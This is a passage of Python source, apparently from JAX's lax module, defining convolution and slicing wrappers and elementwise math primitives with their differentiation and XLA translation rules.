lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'`, the string `'VALID'`.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
Returns:
An array containing the convolution result.
"""
return conv_general_dilated(lhs, rhs, window_strides, padding,
precision=precision)
def conv_with_general_padding(lhs: Array, rhs: Array,
window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
lhs_dilation: Optional[Sequence[int]],
rhs_dilation: Optional[Sequence[int]],
precision: PrecisionLike = None) -> Array:
"""Convenience wrapper around `conv_general_dilated`.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence of
`n` `(low, high)` integer pairs that give the padding to apply before and
after each spatial dimension.
lhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `lhs`. LHS dilation
is also known as transposed convolution.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
Returns:
An array containing the convolution result.
"""
return conv_general_dilated(
lhs, rhs, window_strides, padding, lhs_dilation=lhs_dilation,
rhs_dilation=rhs_dilation, precision=precision)
def _conv_transpose_padding(k, s, padding):
"""Calculate before and after padding for a dim of transposed convolution.
Args:
k: int: kernel dimension.
s: int: dimension stride value.
padding: 'same' or 'valid' padding mode for original forward conv.
Returns:
2-tuple: ints: before and after padding for transposed convolution.
"""
if padding == 'SAME':
pad_len = k + s - 2
if s > k - 1:
pad_a = k - 1
else:
pad_a = int(np.ceil(pad_len / 2))
elif padding == 'VALID':
pad_len = k + s - 2 + _max(k - s, 0)
pad_a = k - 1
else:
raise ValueError('Padding mode must be `SAME` or `VALID`.')
pad_b = pad_len - pad_a
return pad_a, pad_b
def _flip_axes(x, axes):
"""Flip ndarray 'x' along each axis specified in axes tuple."""
for axis in axes:
x = np.flip(x, axis)
return x
def conv_transpose(lhs: Array, rhs: Array, strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
rhs_dilation: Optional[Sequence[int]] = None,
dimension_numbers: ConvGeneralDilatedDimensionNumbers = None,
transpose_kernel: bool = False,
precision: PrecisionLike = None) -> Array:
"""Convenience wrapper for calculating the N-d convolution "transpose".
This function directly calculates a fractionally strided conv rather than
indirectly calculating the gradient (transpose) of a forward convolution.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
strides: sequence of `n` integers, sets fractional stride.
padding: 'SAME', 'VALID' will set as transpose of corresponding forward
conv, or a sequence of `n` integer 2-tuples describing before-and-after
padding for each `n` spatial dimension.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
dimension_numbers: tuple of dimension descriptors as in
lax.conv_general_dilated. Defaults to tensorflow convention.
transpose_kernel: if True flips spatial axes and swaps the input/output
channel axes of the kernel. This makes the output of this function identical
to the gradient-derived functions like keras.layers.Conv2DTranspose
applied to the same kernel. For typical use in neural nets this is completely
pointless and just makes input/output channel specification confusing.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
Returns:
Transposed N-d convolution, with output padding following the conventions of
keras.layers.Conv2DTranspose.
"""
assert len(lhs.shape) == len(rhs.shape) and len(lhs.shape) >= 2
ndims = len(lhs.shape)
one = (1,) * (ndims - 2)
# Set dimensional layout defaults if not specified.
if dimension_numbers is None:
if ndims == 2:
dimension_numbers = ('NC', 'IO', 'NC')
elif ndims == 3:
dimension_numbers = ('NHC', 'HIO', 'NHC')
elif ndims == 4:
dimension_numbers = ('NHWC', 'HWIO', 'NHWC')
elif ndims == 5:
dimension_numbers = ('NHWDC', 'HWDIO', 'NHWDC')
else:
raise ValueError('No 4+ dimensional dimension_number defaults.')
dn = conv_dimension_numbers(lhs.shape, rhs.shape, dimension_numbers)
k_shape = np.take(rhs.shape, dn.rhs_spec)
k_sdims = k_shape[2:] # type: ignore[index]
# Calculate correct output shape given padding and strides.
pads: Union[str, Sequence[Tuple[int, int]]]
if padding in {'SAME', 'VALID'}:
if rhs_dilation is None:
rhs_dilation = (1,) * (rhs.ndim - 2)
effective_k_size = map(lambda k, r: (k-1) * r + 1, k_sdims, rhs_dilation)
pads = [_conv_transpose_padding(k, s, padding)
for k,s in zip(effective_k_size, strides)]
else:
pads = padding
if transpose_kernel:
# flip spatial dims and swap input / output channel axes
rhs = _flip_axes(rhs, np.array(dn.rhs_spec)[2:])
rhs = np.swapaxes(rhs, dn.rhs_spec[0], dn.rhs_spec[1])
return conv_general_dilated(lhs, rhs, one, pads, strides, rhs_dilation, dn,
precision=precision)
def full_like(x: Array, fill_value: Array, dtype: Optional[DType] = None,
shape: Optional[Shape] = None) -> Array:
"""Create a full array like np.full based on the example array `x`.
Args:
x: example array-like, used for shape and dtype information.
fill_value: a scalar value to fill the entries of the output array.
dtype: optional, a dtype parameter for the output ndarray.
shape: optional, a shape parameter for the output ndarray.
Returns:
An ndarray with the same shape as `x` with its entries set equal to
`fill_value`, similar to the output of np.full.
"""
fill_shape = np.shape(x) if shape is None else canonicalize_shape(shape)
weak_type = dtype is None and dtypes.is_weakly_typed(x)
dtype = dtype or _dtype(x)
if not config.omnistaging_enabled:
fill_value = tie_in(x, fill_value)
return full(fill_shape, convert_element_type(fill_value, dtype, weak_type))
def collapse(operand: Array, start_dimension: int,
stop_dimension: int) -> Array:
"""Collapses dimensions of an array into a single dimension.
For example, if ``operand`` is an array with shape ``[2, 3, 4]``,
``collapse(operand, 0, 2).shape == [6, 4]``. The elements of the collapsed
dimension are laid out major-to-minor, i.e., with the lowest-numbered
dimension as the slowest varying dimension.
Args:
operand: an input array.
start_dimension: the start of the dimensions to collapse (inclusive).
stop_dimension: the end of the dimensions to collapse (exclusive).
Returns:
An array where dimensions ``[start_dimension, stop_dimension)`` have been
collapsed (raveled) into a single dimension.
"""
lo, hi = start_dimension, stop_dimension
size = prod(operand.shape[lo:hi])
new_shape = operand.shape[:lo] + (size,) + operand.shape[hi:]
return reshape(operand, new_shape)
def slice_in_dim(operand: Array, start_index: Optional[int],
limit_index: Optional[int],
stride: int = 1, axis: int = 0)-> Array:
"""Convenience wrapper around slice applying to only one dimension."""
start_indices = [0] * operand.ndim
limit_indices = list(operand.shape)
strides = [1] * operand.ndim
# translate `None`
len_axis = operand.shape[axis]
start_index_int = _canonicalize_dimension(start_index) if start_index is not None else 0
limit_index_int = _canonicalize_dimension(limit_index) if limit_index is not None else len_axis
# translate negative indices
if start_index_int < 0:
start_index_int = start_index_int + len_axis
if limit_index_int < 0:
limit_index_int = limit_index_int + len_axis
axis = int(axis)
start_indices[axis] = start_index_int
limit_indices[axis] = limit_index_int
strides[axis] = int(stride)
return slice(operand, start_indices, limit_indices, strides)
def index_in_dim(operand: Array, index: int, axis: int = 0,
keepdims: bool = True) -> Array:
"""Convenience wrapper around slice to perform int indexing."""
index, axis = int(index), int(axis)
axis_size = operand.shape[axis]
wrapped_index = index + axis_size if index < 0 else index
if not 0 <= wrapped_index < axis_size:
msg = 'index {} is out of bounds for axis {} with size {}'
raise IndexError(msg.format(index, axis, axis_size))
result = slice_in_dim(operand, wrapped_index, wrapped_index + 1, 1, axis)
if keepdims:
return result
else:
return squeeze(result, (axis,))
def dynamic_slice_in_dim(operand: Array, start_index: Array,
slice_size: int, axis: int = 0) -> Array:
"""Convenience wrapper around dynamic_slice applying to one dimension."""
start_indices = [_zero(start_index)] * operand.ndim
slice_sizes = list(operand.shape)
axis = int(axis)
start_indices[axis] = start_index
slice_sizes[axis] = int(slice_size)
return dynamic_slice(operand, start_indices, slice_sizes)
def dynamic_index_in_dim(operand: Array, index: Array, axis: int = 0,
keepdims: bool = True) -> Array:
"""Convenience wrapper around dynamic_slice to perform int indexing."""
result = dynamic_slice_in_dim(operand, index, 1, axis)
if keepdims:
return result
else:
return squeeze(result, (axis,))
def dynamic_update_slice_in_dim(operand: Array, update: Array,
start_index: Array, axis: int) -> Array:
"""Convenience wrapper around :func:`dynamic_update_slice` to update a slice
in a single ``axis``.
"""
axis = int(axis)
start_indices = [_zero(start_index)] * _ndim(operand)
start_indices[axis] = start_index
return dynamic_update_slice(operand, update, start_indices)
def dynamic_update_index_in_dim(operand: Array, update: Array, index: Array,
axis: int) -> Array:
"""Convenience wrapper around :func:`dynamic_update_slice` to update a slice
of size 1 in a single ``axis``.
"""
axis = int(axis)
if _ndim(update) != _ndim(operand):
assert _ndim(update) + 1 == _ndim(operand)
update = expand_dims(update, (axis,))
return dynamic_update_slice_in_dim(operand, update, index, axis)
def batch_matmul(lhs: Array, rhs: Array,
precision: PrecisionLike = None) -> Array:
"""Batch matrix multiplication."""
if _min(lhs.ndim, rhs.ndim) < 2:
raise ValueError('Arguments to batch_matmul must be at least 2D, got {}, {}'
.format(lhs.ndim, rhs.ndim))
if lhs.ndim != rhs.ndim:
raise ValueError('Arguments to batch_matmul must have same ndim, got {}, {}'
.format(lhs.ndim, rhs.ndim))
lhs_contract = (lhs.ndim - 1,)
rhs_contract = (rhs.ndim - 2,)
batch = tuple(range(lhs.ndim - 2))
return dot_general(lhs, rhs, ((lhs_contract, rhs_contract), (batch, batch)),
precision=precision)
# These functions also exist in the XLA client library, but we treat them
# as non-primitive to maintain a smaller set of autodiff primitives.
def square(x: Array) -> Array:
r"""Elementwise square: :math:`x^2`."""
return integer_pow(x, 2)
def reciprocal(x: Array) -> Array:
r"""Elementwise reciprocal: :math:`1 \over x`."""
return integer_pow(x, -1)
def _upcast_fp16_for_computation(f):
@functools.wraps(f)
def f_wrapped(x):
dtype = _dtype(x)
if dtype == np.float16 or dtype == dtypes.bfloat16:
return convert_element_type(
f(convert_element_type(x, np.float32)), dtype)
return f(x)
return f_wrapped
def tan(x: Array) -> Array:
r"""Elementwise tangent: :math:`\mathrm{tan}(x)`."""
return tan_p.bind(x)
def asin(x: Array) -> Array:
r"""Elementwise arc sine: :math:`\mathrm{asin}(x)`."""
return asin_p.bind(x)
def acos(x: Array) -> Array:
r"""Elementwise arc cosine: :math:`\mathrm{acos}(x)`."""
return acos_p.bind(x)
def atan(x: Array) -> Array:
r"""Elementwise arc tangent: :math:`\mathrm{atan}(x)`."""
return atan_p.bind(x)
def sinh(x: Array) -> Array:
r"""Elementwise hyperbolic sine: :math:`\mathrm{sinh}(x)`."""
return sinh_p.bind(x)
def cosh(x: Array) -> Array:
r"""Elementwise hyperbolic cosine: :math:`\mathrm{cosh}(x)`."""
return cosh_p.bind(x)
def asinh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic sine: :math:`\mathrm{asinh}(x)`."""
return asinh_p.bind(x)
def acosh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic cosine: :math:`\mathrm{acosh}(x)`."""
return acosh_p.bind(x)
def atanh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic tangent: :math:`\mathrm{atanh}(x)`."""
return atanh_p.bind(x)
# Add some methods to ShapedArray that rely on lax primitives
ShapedArray.broadcast = core.aval_method(broadcast)
ShapedArray.transpose = core.aval_method(transpose) # clobbered by lax_numpy
ShapedArray.reshape = core.aval_method(reshape) # clobbered by lax_numpy
def _iter(tracer):
if tracer.ndim == 0:
raise TypeError("iteration over a 0-d array") # same as numpy error
else:
n = int(tracer.shape[0])
# return (index_in_dim(tracer, i, keepdims=False) for i in range(n))
return iter([index_in_dim(tracer, i, keepdims=False) for i in range(n)])
ShapedArray._iter = staticmethod(_iter)
# Add some ad handlers that use (or could use) lax primitives
def zeros_like_array(x):
return full_like(x, 0)
for t in itertools.chain(
dtypes.python_scalar_dtypes.keys(), array_types,
[xla._CppDeviceArray, xla._DeviceArray, pxla.ShardedDeviceArray]):
ad_util.jaxval_adders[t] = add
ad_util.jaxval_zeros_likers[xla._DeviceArray] = zeros_like_array
ad_util.jaxval_zeros_likers[xla._CppDeviceArray] = zeros_like_array
ad_util.jaxval_zeros_likers[pxla.ShardedDeviceArray] = zeros_like_array
### primitives
_input_dtype = lambda *args, **_: dtypes.canonicalize_dtype(args[0].dtype)
_fixed_dtype = lambda dtype: lambda *args, **kwargs: dtypes.canonicalize_dtype(dtype)
_complex_basetype = lambda dtype: np.abs(np.zeros((), dtype)).dtype
_strip_weak_type = lambda *args, **_: False
def _argnum_weak_type(*argnums):
return lambda *args, **_: all(args[i].weak_type for i in argnums)
def standard_primitive(shape_rule, dtype_rule, name, translation_rule=None,
weak_type_rule=None):
weak_type_rule = weak_type_rule or _standard_weak_type_rule
prim = Primitive(name)
prim.def_impl(partial(xla.apply_primitive, prim))
prim.def_abstract_eval(partial(standard_abstract_eval, prim, shape_rule, dtype_rule, weak_type_rule))
xla.translations[prim] = translation_rule or partial(standard_translate, name)
return prim
def standard_abstract_eval(prim, shape_rule, dtype_rule, weak_type_rule, *avals, **kwargs):
assert all(isinstance(aval, UnshapedArray) for aval in avals), avals
assert not prim.multiple_results
weak_type = weak_type_rule(*avals, **kwargs)
least_specialized = _max(map(type, avals),
key=operator.attrgetter('array_abstraction_level'))
if least_specialized is ConcreteArray:
return ConcreteArray(prim.impl(*[x.val for x in avals], **kwargs),
weak_type=weak_type)
elif least_specialized is ShapedArray:
return ShapedArray(shape_rule(*avals, **kwargs), dtype_rule(*avals, **kwargs),
weak_type=weak_type)
elif least_specialized is UnshapedArray:
return UnshapedArray(dtype_rule(*avals, **kwargs), weak_type=weak_type)
else:
raise TypeError(avals, least_specialized)
def standard_multi_result_abstract_eval(
prim, shape_rule, dtype_rule, weak_type_rule, *avals, **kwargs):
assert prim.multiple_results
assert all(isinstance(aval, UnshapedArray) for aval in avals), avals
least_specialized = _max(map(type, avals),
key=operator.attrgetter('array_abstraction_level'))
weak_types = weak_type_rule(*avals, **kwargs)
if least_specialized is ConcreteArray:
out_vals = prim.impl(*[x.val for x in avals], **kwargs)
return [ConcreteArray(val, weak_type=weak_type)
for val, weak_type in safe_zip(out_vals, weak_types)]
elif least_specialized is ShapedArray:
out_shapes = shape_rule(*avals, **kwargs)
out_dtypes = dtype_rule(*avals, **kwargs)
return [ShapedArray(s, d, weak_type=weak_type)
for s, d, weak_type in safe_zip(out_shapes, out_dtypes, weak_types)]
elif least_specialized is UnshapedArray:
out_dtypes = dtype_rule(*avals, **kwargs)
return [UnshapedArray(dtype, weak_type=weak_type)
for dtype, weak_type in safe_zip(out_dtypes, weak_types)]
else:
raise TypeError(avals, least_specialized)
def standard_translate(name, c, *args, **kwargs):
xla_opname = ''.join(term.capitalize() for term in name.split('_'))
return getattr(xops, xla_opname)(*args, **kwargs)
def unop_dtype_rule(result_dtype, accepted_dtypes, name, aval, **kwargs):
if not any(dtypes.issubdtype(aval.dtype, t) for t in accepted_dtypes):
msg = '{} does not accept dtype {}. Accepted dtypes are subtypes of {}.'
typename = str(np.dtype(aval.dtype).name)
accepted_typenames = (t.__name__ for t in accepted_dtypes)
raise TypeError(msg.format(name, typename, ', '.join(accepted_typenames)))
return result_dtype(aval.dtype)
def unop(result_dtype, accepted_dtypes, name, translation_rule=None):
dtype_rule = partial(unop_dtype_rule, result_dtype, accepted_dtypes, name)
weak_type_rule = partial(_naryop_weak_type_rule, name)
prim = standard_primitive(_attrgetter('shape'), dtype_rule, name,
translation_rule=translation_rule, weak_type_rule=weak_type_rule)
batching.defvectorized(prim)
masking.defvectorized(prim)
return prim
standard_unop = partial(unop, _identity)
_attrgetter = lambda name: lambda x, **kwargs: getattr(x, name)
def naryop_dtype_rule(result_dtype, accepted_dtypes, name, *avals, **kwargs):
aval_dtypes = [aval.dtype for aval in avals]
for i, (aval_dtype, types) in enumerate(zip(aval_dtypes, accepted_dtypes)):
if not any(dtypes.issubdtype(aval_dtype, t) for t in types):
if aval_dtype is dtypes.float0:
raise TypeError(
f"Called {name} with a float0 at position {i}. "
"float0s do not support any operations by design, because they "
"are not compatible with non-trivial vector spaces. No implicit dtype "
"conversion is done. You can use np.zeros_like(arr, dtype=np.float) "
"to cast a float0 array to a regular zeros array. \n"
"If you didn't expect to get a float0 you might have accidentally "
"taken a gradient with respect to an integer argument.")
else:
msg = ('{} does not accept dtype {} at position {}. '
'Accepted dtypes at position {} are subtypes of {}.')
typename = str(np.dtype(aval_dtype).name)
typenames = ', '.join(t.__name__ for t in types)
raise TypeError(msg.format(name, typename, i, i, typenames))
_check_same_dtypes(name, False, *aval_dtypes)
return result_dtype(*avals)
def _broadcasting_shape_rule(name, *avals):
shapes = [aval.shape for aval in avals if aval.shape]
if not shapes:
return ()
if len({len(shape) for shape in shapes}) != 1:
msg = '{} got arrays of different rank: {}.'
raise TypeError(msg.format(name, ', '.join(map(str, map(tuple, shapes)))))
result_shape = _try_broadcast_shapes(shapes)
if result_shape is None:
msg = '{} got incompatible shapes for broadcasting: {}.'
raise TypeError(msg.format(name, ', '.join(map(str, map(tuple, shapes)))))
return result_shape
def _standard_weak_type_rule(*avals, **kwargs):
return all(aval.weak_type for aval in avals)
def _naryop_weak_type_rule(name, *avals, **kwargs):
if any(aval.dtype is dtypes.float0 for aval in avals):
pos = next(i for i, aval in enumerate(avals) if aval.dtype is dtypes.float0)
raise TypeError(
f"Called {name} with a float0 at position {pos}. "
"float0s do not support any operations by design, because they "
"are not compatible with non-trivial vector spaces. No implicit dtype "
"conversion is done. You can use np.zeros_like(arr, dtype=np.float) "
"to cast a float0 array to a regular zeros array. \n"
"If you didn't expect to get a float0 you might have accidentally "
"taken a gradient with respect to an integer argument.")
return all(aval.weak_type for aval in avals)
def naryop(result_dtype, accepted_dtypes, name, translation_rule=None):
dtype_rule = partial(naryop_dtype_rule, result_dtype, accepted_dtypes, name)
shape_rule = partial(_broadcasting_shape_rule, name)
weak_type_rule = partial(_naryop_weak_type_rule, name)
prim = standard_primitive(shape_rule, dtype_rule, name,
translation_rule=translation_rule,
weak_type_rule=weak_type_rule)
batching.defbroadcasting(prim)
masking.defnaryop(prim)
return prim
standard_naryop = partial(naryop, _input_dtype)
def _broadcast_translate(translate: Callable):
# Decorator for translation rules which adds explicit broadcasting of
# positional arguments. This is necessary only for a handful of primitives
# whose XLA implementations do not support broadcasting.
def _broadcast_array(array, array_shape, result_shape):
if array_shape == result_shape:
return array
bcast_dims = tuple(range(len(result_shape) - len(array_shape),
len(result_shape)))
result = xops.BroadcastInDim(array, result_shape, bcast_dims)
return result
def _broadcasted_translation_rule(c, *args, **kwargs):
shapes = [c.get_shape(arg).dimensions() for arg in args]
result_shape = broadcast_shapes(*shapes)
args = [_broadcast_array(arg, arg_shape, result_shape)
for arg, arg_shape in zip(args, shapes)]
return translate(c, *args, **kwargs)
return _broadcasted_translation_rule
# NOTE(mattjj): this isn't great for orchestrate fwd mode because it means JVPs
# get two extra ops in them: a reshape and a broadcast_in_dim (or sometimes just
# a broadcast). but saving the shape info with the primitives isn't great either
# because then we can't trace these ops without shape data.
def _brcast(x, *others):
# Used in jvprules to make naryop broadcasting explicit for transposability.
# Requires shape info during jvp tracing, which isn't strictly necessary.
# We don't need full numpy broadcasting, but otherwise the logic is the same
# so we reuse the broadcast_shapes function after filtering out scalars.
shapes = tuple(filter(None, map(np.shape, (x,) + others)))
shape = shapes and broadcast_shapes(*shapes)
if np.shape(x) != shape:
return _brcast_to(x, shape)
else:
return x
def _brcast_to(x, shape):
x_shape = np.shape(x)
assert x_shape != shape
if x_shape:
assert len(x_shape) == len(shape)
broadcast_dimensions, = np.where(np.equal(x_shape, shape))
squeezed_dimensions, = np.where(np.not_equal(x_shape, shape))
squeezed = squeeze(x, squeezed_dimensions)
return broadcast_in_dim(squeezed, shape, broadcast_dimensions)
else:
return broadcast(x, shape)
_float = {np.floating}
_complex = {np.complexfloating}
_complex_elem_types = {np.float32, np.float64}
_int = {np.integer}
_bool = {np.bool_}
_num = _int | _float | _complex
_any = _int | _float | _complex | _bool
_bool_or_int = _int | _bool
neg_p = standard_unop(_num, 'neg')
ad.deflinear2(neg_p, lambda t, operand: [neg(t)])
def _sign_translation_rule(c, x):
shape = c.get_shape(x)
dtype = shape.numpy_dtype()
if dtypes.issubdtype(dtype, np.unsignedinteger):
zero = xb.constant(c, np.array(0, dtype=dtype))
dims = c.get_shape(x).dimensions()
return xops.Select(xops.Eq(x, zero), xops.Broadcast(zero, dims),
xops.Broadcast(xb.constant(c, np.array(1, dtype=dtype)),
dims))
return xops.Sign(x)
sign_p = standard_unop(_num, 'sign', translation_rule=_sign_translation_rule)
ad.defjvp_zero(sign_p)
nextafter_p = standard_naryop(
[_float, _float], 'nextafter',
translation_rule=_broadcast_translate(partial(standard_translate, 'next_after')))
floor_p = standard_unop(_float, 'floor')
ad.defjvp_zero(floor_p)
ceil_p = standard_unop(_float, 'ceil')
ad.defjvp_zero(ceil_p)
def _round_to_nearest_even(x):
half = _const(x, 0.5)
one = _const(x, 1)
round_val = floor(x)
fraction = x - round_val
nearest_even_int = sub(
round_val, mul(_const(x, 2), floor(mul(half, x))))
is_odd = eq(nearest_even_int, one)
return select(
bitwise_or(gt(fraction, half),
bitwise_and(eq(fraction, half), is_odd)),
add(round_val, one), round_val)
def _round_translation_rule(c, x, *, rounding_method):
if rounding_method is RoundingMethod.AWAY_FROM_ZERO:
return xops.Round(x)
else: # rounding_method is RoundingMethod.TO_NEAREST_EVEN
rounding_fun = xla.lower_fun(_round_to_nearest_even, multiple_results=False)
return rounding_fun(c, x)
round_p = standard_unop(_float, 'round')
xla.translations[round_p] = _round_translation_rule
ad.defjvp_zero(round_p)
is_finite_p = unop(_fixed_dtype(np.bool_), _float, 'is_finite')
ad.defjvp_zero(is_finite_p)
exp_p = standard_unop(_float | _complex, 'exp')
ad.defjvp2(exp_p, lambda g, ans, x: mul(g, ans))
iad.definverse(exp_p, lambda r, x: log(r))
# For exp_p it is more efficient to use the reconstructed output for the vjp
# rule instead of computing it again from the input.
iad.primitive_ivjps[exp_p] = lambda x, y, ct: [[log(y[0])], [ct[0] * y[0]]]
log_p = standard_unop(_float | _complex, 'log')
ad.defjvp(log_p, lambda g, x: div(g, x))
iad.definverse(log_p, lambda r, x: exp(r))
expm1_p = standard_unop(_float | _complex, 'expm1')
ad.defjvp2(expm1_p, lambda g, ans, x: mul(g, add(ans, _one(ans))))
log1p_p = standard_unop(_float | _complex, 'log1p')
ad.defjvp(log1p_p, lambda g, x: div(g, add(x, _one(x))))
tanh_p = standard_unop(_float | _complex, 'tanh')
ad.defjvp2(tanh_p, lambda g, ans, x: mul(add(g, mul(g, ans)),
sub(_one(x), ans)))
sin_p = standard_unop(_float | _complex, 'sin')
ad.defjvp(sin_p, lambda g, x: mul(g, cos(x)))
cos_p = standard_unop(_float | _complex, 'cos')
ad.defjvp(cos_p, lambda g, x: neg(mul(g, sin(x))))
@partial(xla.lower_fun, multiple_results=False)
@_upcast_fp16_for_computation
def tan_translation_rule(x):
return div(sin(x), cos(x))
tan_p = standard_unop(_float | _complex, 'tan',
translation_rule=tan_translation_rule)
ad.defjvp(tan_p, lambda g, x: mul(g, _const(x, 1) + square(tan(x))))
@partial(xla.lower_fun, multiple_results=False)
def asin_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
return mul(_const(x, -1j), asinh(mul(_const(x, 1j), x)))
else:
return mul(_const(x, 2),
atan2(x, add(_const(x, 1), sqrt(sub(_const(x, 1), square(x))))))
asin_p = standard_unop(_float | _complex, 'asin',
translation_rule=asin_translation_rule)
ad.defjvp(asin_p, lambda g, x: mul(g, rsqrt(_const(x, 1) - square(x))))
@partial(xla.lower_fun, multiple_results=False)
def acos_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
result = mul(_const(x, 1j), acosh(x))
# By convention, numpy chooses the branch with positive real part.
rpart = real(result)
return select(
gt(rpart, _const(rpart, 0)),
result,
neg(result)
)
else:
return select(
ne(x, _const(x, -1.0)),
mul(_const(x, 2),
atan2(sqrt(sub(_const(x, 1), square(x))), add(_const(x, 1), x))),
full_like(x, np.pi))
acos_p = standard_unop(_float | _complex, 'acos',
translation_rule=acos_translation_rule)
ad.defjvp(acos_p, lambda g, x: mul(g, -rsqrt(_const(x, 1) - square(x))))
@partial(xla.lower_fun, multiple_results=False)
def atan_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
return mul(_const(x, -1j), atanh(mul(_const(x, 1j), x)))
else:
return atan2(x, _const(x, 1))
atan_p = standard_unop(_float | _complex, 'atan',
translation_rule=atan_translation_rule)
ad.defjvp(atan_p, lambda g, x: div(g, _const(x, 1) + square(x)))
atan2_p = standard_naryop([_float, _float], 'atan2')
ad.defjvp(atan2_p,
lambda g, x, y: _brcast(g, y) * (y / (square(x) + square(y))),
lambda g, x, y: _brcast(g, x) * -x / (square(x) + square(y)))
sinh_p = standard_unop(_float | _complex, 'sinh')
ad.defjvp(sinh_p, lambda g, x: mul(g, cosh(x)))
cosh_p = standard_unop(_float | _complex, 'cosh')
ad.defjvp(cosh_p, lambda g, x: mul(g, sinh(x)))
asinh_p = standard_unop(_float | _complex, 'asinh')
ad.defjvp(asinh_p, lambda g, x: mul(g, rsqrt(square(x) + _one(x))))
acosh_p = standard_unop(_float | _complex, 'acosh')
ad.defjvp(acosh_p,
lambda g, x: mul(g, rsqrt((x - _one(x)) * (x + _one(x)))))
atanh_p = standard_unop(_float | _complex, 'atanh')
ad.defjvp(atanh_p,
lambda g, x: mul(reciprocal(_one(x) + x), div(g, (_one(x) - x))))
regularized_incomplete_beta_p = standard_naryop(
[_float, _float, _float], 'regularized_incomplete_beta',
translation_rule=_broadcast_translate(
partial(standard_translate, 'regularized_incomplete_beta')))
def betainc_gradx(g, a, b, x):
lbeta = lgamma(a) + lgamma(b) - lgamma(a + b)
partial_x = exp((b - 1) * log1p(-x) +
(a - 1) * log(x) - lbeta)
return partial_x * g
def betainc_grad_not_implemented(g, a, b, x):
raise ValueError("Betainc gradient with respect to a and b not supported.")
ad.defjvp(regularized_incomplete_beta_p,
betainc_grad_not_implemented,
betainc_grad_not_implemented,
betainc_gradx)
lgamma_p = standard_unop(_float, 'lgamma')
ad.defjvp(lgamma_p, lambda g, x: mul(g, digamma(x)))
digamma_p = standard_unop(_float, 'digamma')
igamma_p = standard_naryop(
[_float, _float], 'igamma',
translation_rule=_broadcast_translate(partial(standard_translate, 'igamma')))
igamma_grad_a_p = standard_naryop([_float, _float], 'igamma_grad_a',
translation_rule=_broadcast_translate(partial(standard_translate,
'igamma_grad_a')))
def igamma_gradx(g, a, x):
return _brcast(g, a, x) * exp(-x + (a - _ones(a)) * log(x) - lgamma(a))
def igamma_grada(g, a, x):
return _brcast(g, a, x) * igamma_grad_a(a, x)
ad.defjvp(igamma_p, igamma_grada, igamma_gradx)
igammac_p = standard_naryop(
[_float, _float], 'igammac',
translation_rule=_broadcast_translate(partial(standard_translate, 'igammac')))
def igammac_gradx(g, a, x):
return -igamma_gradx(g, a, x)
def igammac_grada(g, a, x):
return -igamma_grada(g, a, x)
ad.defjvp(igammac_p, igammac_grada, igammac_gradx)
random_gamma_grad_p = standard_naryop([_float, _float], 'random_gamma_grad',
translation_rule=_broadcast_translate(partial(standard_translate,
'random_gamma_grad')))
bessel_i0e_p = standard_unop(_float, 'bessel_i0e')
ad.defjvp2(bessel_i0e_p, lambda g, y, x: g * (bessel_i1e(x) - sign(x) * y))
bessel_i1e_p = standard_unop(_float, 'bessel_i1e')
def _bessel_i1e_jvp(g, y, x):
eps = dtypes.finfo(_dtype(x)).eps
x_is_not_tiny = abs(x) > eps
safe_x = select(x_is_not_tiny, x, full_like(x, eps))
dy_dx = bessel_i0e(safe_x) - y * (sign(safe_x) + reciprocal(safe_x))
dy_dx = select(x_is_not_tiny, dy_dx, full_like(x, 0.5))
return g * dy_dx
ad.defjvp2(bessel_i1e_p, _bessel_i1e_jvp)
erf_p = standard_unop(_float, 'erf')
ad.defjvp(erf_p, lambda g, x: mul(_const(x, 2. / np.sqrt(np.pi)),
mul(g, exp(neg(square(x))))))
erfc_p = standard_unop(_float, 'erfc')
ad.defjvp(erfc_p, lambda g, x: mul(_const(x, 2. / np.sqrt(np.pi)),
mul(neg(g), exp(neg(square(x))))))
erf_inv_p = standard_unop(_float, 'erf_inv')
ad.defjvp2(erf_inv_p, lambda g, ans, x: mul(_const(x, np.sqrt(np.pi) / 2.),
mul(g, exp(square(ans)))))
real_p = unop(_complex_basetype, _complex, 'real')
ad.deflinear2(real_p, lambda t, _: [complex(t, np.zeros((), _dtype(t)))])
imag_p = unop(_complex_basetype, _complex, 'imag')
ad.deflinear2(imag_p, lambda t, _: [complex(np.zeros((), _dtype(t)), neg(t))])
_complex_dtype = lambda dtype, *args: (np.zeros((), dtype) + np.zeros((), np.complex64)).dtype
complex_p = naryop(_complex_dtype, [_complex_elem_types, _complex_elem_types],
'complex')
ad.deflinear2(complex_p, lambda t, *args: [real(t), imag(neg(t))])
conj_p = unop(_complex_dtype, _complex_elem_types | _complex, 'conj')
def _conj_transpose_rule(t, x, *, input_dtype):
assert ad.is_undefined_primal(x)
